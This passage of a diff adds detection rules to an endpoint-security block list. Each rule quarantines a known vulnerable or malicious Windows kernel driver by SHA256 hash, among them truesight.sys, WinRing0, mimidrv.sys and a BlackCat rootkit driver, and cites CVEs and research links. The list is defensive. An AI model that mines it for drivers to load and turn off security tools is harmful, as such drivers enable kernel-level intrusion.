+ "value": "24395b622d4fd48864a50978ffd2b82fdded5189741a6deea9293cc075cd0c6b",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka dkrTK.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a08e9c2-aa2b-5a9f-b19b-932dbe08275a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487992Z",
+ "creation_date": "2026-03-23T11:45:31.487994Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487999Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7b66aa27c75ae2109da03c276bedce8a1c9d978929587f219d435068bc6fdc5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a0928c2-bb7d-5d97-98aa-99427c11779e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159439Z",
+ "creation_date": "2026-03-23T11:45:31.159441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fcf57a17d44a6583153261a9c43211ad1d65a1f5ebda12cb1856629e774bdb9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a0b25fa-8131-54c0-b799-7c16ee00662f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492574Z",
+ "creation_date": "2026-03-23T11:45:31.492576Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492581Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14d3a333327078aa265028c992293ac58655d8376c3e5110519fbaa079b2fc36",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a0f9dbf-e318-5785-8cea-ce5820276cbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617167Z",
+ "creation_date": "2026-03-23T11:45:29.617169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5",
+ "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a2b70bc-1678-570f-9173-747a031380e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983122Z",
+ "creation_date": "2026-03-23T11:45:29.983124Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983129Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1ee0b8a7974f3d11c10241027c0e7171c798a28589aae9ff8c5a86228642af7",
+ "comment": "Malicious Kernel Driver (aka wantd_3.sys) [https://www.loldrivers.io/drivers/a22104a8-126d-449f-ba3e-28678c60c587/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a2bbcd1-73a6-576f-870e-74b7f61b09e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455816Z",
+ "creation_date": "2026-03-23T11:45:30.455820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455829Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80b2c44b2cdb74bafcc1271c5338f1d80f3621308b6c9d24d52bb28c8983677c",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a3a32b8-a832-597a-82ae-ed3eef3f84d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982253Z",
+ "creation_date": "2026-03-23T11:45:29.982255Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982261Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7047cee090ddbd150d7337a9357e03ccea56f004a2d29ddb7b8a0636a396240",
+ "comment": "Vulnerable Kernel Driver (aka KfeCo11X64.sys) [https://www.loldrivers.io/drivers/76b5dfae-b384-45ce-8646-b2eec6b76a1e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a3ca41e-25b6-565d-ac7e-04d0b3483ab8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146865Z",
+ "creation_date": "2026-03-23T11:45:31.146867Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146884Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "abd10f102691ac30182a9ad827348cd480512a7f56fdbd9e450a8aaae2c837de",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a3ce5ab-06e8-5c07-9740-330dad25c761",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149222Z",
+ "creation_date": "2026-03-23T11:45:31.149224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "128c06b72d6dc977f4bb042ea1899be9ee0e8444f23bb87be606551c01e5adf8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a52585c-37ca-5252-af03-8302756c1a01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608596Z",
+ "creation_date": "2026-03-23T11:45:29.608598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4c6063550ccae04771484b5eb60b5be33d07cebfbc3caa47e5f369f9fb50fc7",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a5b8176-be27-5e53-9748-b0c93fc82ee0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463212Z",
+ "creation_date": "2026-03-23T11:45:30.463215Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463224Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0b80a11802b4a8ca69c818a03e76e7ef57c2e293de456439401e8e6073f8719",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a5efa77-642e-5361-bd59-9092809ab5a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622949Z",
+ "creation_date": "2026-03-23T11:45:29.622951Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622957Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6753d2e6cf2f11932b4fedd4362ab57651f8f3baa886eace22fd98a14ebc2e8",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a624cf2-d115-5acb-a507-21ae38161cbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489827Z",
+ "creation_date": "2026-03-23T11:45:31.489830Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2de8a42b61fcc910baaef045c02e34d5734c17362c4c9c59ebe31b09dca9501a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a64bf39-4827-5a24-a236-e7ef77383d92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978562Z",
+ "creation_date": "2026-03-23T11:45:29.978564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41",
+ "comment": "Vulnerable Kernel Driver (aka IOMap64.sys) [https://www.loldrivers.io/drivers/f4990bdd-8821-4a3c-a11a-4651e645810c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a668372-1b9e-5fea-9a7c-30facbfed65f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817004Z",
+ "creation_date": "2026-03-23T11:45:31.817006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817011Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "871699ac3fb68074ce6311aa3c73427f18c314c9e9d2591314479fd171b5de04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a767f35-e879-541d-8dd1-ef6684b7e619",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822891Z",
+ "creation_date": "2026-03-23T11:45:31.822894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f3726da10f29b45473ea00b336648ce38b375a107f212e8d61a93d7140301e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a7820ad-fbc1-5acb-8688-265b7c6a4835",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608033Z",
+ "creation_date": "2026-03-23T11:45:29.608035Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608041Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8eb26b6f79020ae988e4fb752dc06e1b6779749bf4f8df2872fc2b92bab8020",
+ "comment": "Vulnerable Kernel Driver (aka tfbfs3ped.sys) [https://www.loldrivers.io/drivers/500e07cb-77c6-4e83-ae3f-73f70f1c10b5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a78f9a1-58ad-5bb3-b213-06fc39e4246e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486638Z",
+ "creation_date": "2026-03-23T11:45:31.486642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486651Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3df955b65cf8868501e7584ea4c444c8ec848c338bf1ce0174f7284f82b2e458",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a7933cd-ecfb-51ad-93e2-4913d3fc1da8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455417Z",
+ "creation_date": "2026-03-23T11:45:30.455420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bf84bed9b5fa4576182c84d2f31679dc472acd0f83c9813498e9f71ed9fef3e",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotrpg.sys) [https://www.loldrivers.io/drivers/181b89e5-4bdd-4e95-b1bc-a294a4adfb29/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a8a6c3d-eeaf-5567-bfa6-d648744181b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453041Z",
+ "creation_date": "2026-03-23T11:45:30.453045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c08581e3e444849729c5b956d0d6030080553d0bc6e5ae7e9a348d45617b9746",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a8e0509-4ee8-5f29-9618-7fb09c152d7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475601Z",
+ "creation_date": "2026-03-23T11:45:31.475605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475615Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "027e22a238d1033467ec4800479392e27f4e5fd4a50785f96a32722d15df5acf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a91b4bb-e231-5476-b96e-68d0e2a130b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478833Z",
+ "creation_date": "2026-03-23T11:45:31.478837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478846Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4060fe83f89ef7c94f52a20dbbcb8e6303cb9f493d622b7785763612f9d17e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
